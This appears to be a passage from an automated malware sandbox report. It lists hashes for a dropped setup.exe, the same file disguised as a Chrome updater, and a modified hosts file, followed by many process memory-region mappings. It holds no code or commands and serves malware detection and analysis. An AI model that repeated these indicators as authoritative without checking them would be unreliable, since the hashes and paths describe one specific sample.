                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • \??\PIPE\srvsvc
                                                MD5

                                                d41d8cd98f00b204e9800998ecf8427e

                                                SHA1

                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                SHA256

                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                SHA512

                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                              • \Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • \Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • memory/320-152-0x0000000000000000-mapping.dmp
                                              • memory/320-82-0x0000000000000000-mapping.dmp
                                              • memory/580-99-0x0000000000000000-mapping.dmp
                                              • memory/580-87-0x0000000000000000-mapping.dmp
                                              • memory/592-110-0x0000000000000000-mapping.dmp
                                              • memory/612-157-0x0000000000000000-mapping.dmp
                                              • memory/624-113-0x0000000000000000-mapping.dmp
                                              • memory/624-88-0x0000000000000000-mapping.dmp
                                              • memory/624-135-0x0000000000000000-mapping.dmp
                                              • memory/696-109-0x0000000000000000-mapping.dmp
                                              • memory/740-106-0x0000000000000000-mapping.dmp
                                              • memory/848-54-0x0000000075951000-0x0000000075953000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/860-139-0x0000000000000000-mapping.dmp
                                              • memory/888-104-0x0000000000000000-mapping.dmp
                                              • memory/904-105-0x0000000000000000-mapping.dmp
                                              • memory/936-58-0x0000000000000000-mapping.dmp
                                              • memory/936-140-0x0000000000000000-mapping.dmp
                                              • memory/940-68-0x0000000077800000-0x00000000779A9000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/940-85-0x0000000000000000-mapping.dmp
                                              • memory/940-56-0x0000000000000000-mapping.dmp
                                              • memory/940-67-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/940-62-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/940-64-0x0000000077800000-0x00000000779A9000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/940-65-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/940-66-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1108-143-0x0000000000000000-mapping.dmp
                                              • memory/1108-197-0x0000000000900000-0x0000000000906000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1108-199-0x0000000000060000-0x0000000000067000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/1124-92-0x0000000000000000-mapping.dmp
                                              • memory/1124-103-0x0000000000000000-mapping.dmp
                                              • memory/1240-111-0x0000000000000000-mapping.dmp
                                              • memory/1264-142-0x0000000000000000-mapping.dmp
                                              • memory/1300-86-0x0000000000000000-mapping.dmp
                                              • memory/1308-147-0x0000000000000000-mapping.dmp
                                              • memory/1320-136-0x0000000000000000-mapping.dmp
                                              • memory/1356-153-0x0000000000000000-mapping.dmp
                                              • memory/1376-97-0x0000000000000000-mapping.dmp
                                              • memory/1444-81-0x0000000000000000-mapping.dmp
                                              • memory/1444-126-0x0000000000000000-mapping.dmp
                                              • memory/1456-196-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-168-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-165-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-166-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-162-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-151-0x0000000000000000-mapping.dmp
                                              • memory/1456-161-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-160-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1456-164-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1476-146-0x0000000000000000-mapping.dmp
                                              • memory/1476-100-0x0000000000000000-mapping.dmp
                                              • memory/1504-154-0x0000000000000000-mapping.dmp
                                              • memory/1520-96-0x0000000000000000-mapping.dmp
                                              • memory/1520-159-0x0000000000210000-0x0000000000216000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1520-108-0x0000000000000000-mapping.dmp
                                              • memory/1556-76-0x000007FEED780000-0x000007FEEE2DD000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/1556-107-0x0000000000000000-mapping.dmp
                                              • memory/1556-73-0x0000000000000000-mapping.dmp
                                              • memory/1556-80-0x00000000024AB000-0x00000000024CA000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/1556-77-0x00000000024A4000-0x00000000024A7000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1556-79-0x00000000024A4000-0x00000000024A7000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1556-78-0x000000001B730000-0x000000001BA2F000-memory.dmp
                                                Filesize

                                                3.0MB

                                              • memory/1560-155-0x0000000000000000-mapping.dmp
                                              • memory/1584-98-0x0000000000000000-mapping.dmp
                                              • memory/1604-83-0x0000000000000000-mapping.dmp
                                              • memory/1620-72-0x0000000000000000-mapping.dmp
                                              • memory/1692-137-0x0000000000000000-mapping.dmp
                                              • memory/1728-141-0x0000000000000000-mapping.dmp
                                              • memory/1736-144-0x0000000000000000-mapping.dmp
                                              • memory/1752-149-0x0000000000000000-mapping.dmp
                                              • memory/1760-59-0x0000000000000000-mapping.dmp
                                              • memory/1904-89-0x0000000000000000-mapping.dmp
                                              • memory/1924-148-0x0000000000000000-mapping.dmp
                                              • memory/1944-69-0x0000000000100000-0x000000000051C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1944-70-0x000000001BA50000-0x000000001BE6C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1944-71-0x000007FEFC081000-0x000007FEFC083000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/1948-84-0x0000000000000000-mapping.dmp
                                              • memory/1968-145-0x0000000000000000-mapping.dmp
                                              • memory/2000-158-0x0000000000000000-mapping.dmp
                                              • memory/2000-114-0x0000000000000000-mapping.dmp
                                              • memory/2004-93-0x0000000000000000-mapping.dmp
                                              • memory/2004-124-0x0000000077800000-0x00000000779A9000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/2004-123-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2004-121-0x0000000077800000-0x00000000779A9000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/2004-120-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2004-116-0x0000000000000000-mapping.dmp
                                              • memory/2004-119-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2004-150-0x0000000000000000-mapping.dmp
                                              • memory/2008-94-0x0000000000000000-mapping.dmp
                                              • memory/2012-122-0x00000000012C0000-0x0000000001F2A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2012-118-0x00000000012C0000-0x0000000001F2A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2012-102-0x0000000000000000-mapping.dmp
                                              • memory/2012-90-0x0000000000000000-mapping.dmp
                                              • memory/2020-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-185-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-169-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-170-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-172-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-174-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-176-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-179-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-182-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-180-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-200-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-186-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-91-0x0000000000000000-mapping.dmp
                                              • memory/2020-188-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-190-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-191-0x00000000000E0000-0x0000000000100000-memory.dmp
                                                Filesize

                                                128KB

                                              • memory/2020-192-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/2020-101-0x0000000000000000-mapping.dmp
                                              • memory/2024-95-0x0000000000000000-mapping.dmp
                                              • memory/2032-127-0x0000000000000000-mapping.dmp
                                              • memory/2032-131-0x000007FEEC8A0000-0x000007FEED3FD000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/2032-132-0x0000000001274000-0x0000000001277000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/2032-133-0x0000000001274000-0x0000000001277000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/2032-134-0x000000000127B000-0x000000000129A000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/2040-138-0x0000000000000000-mapping.dmp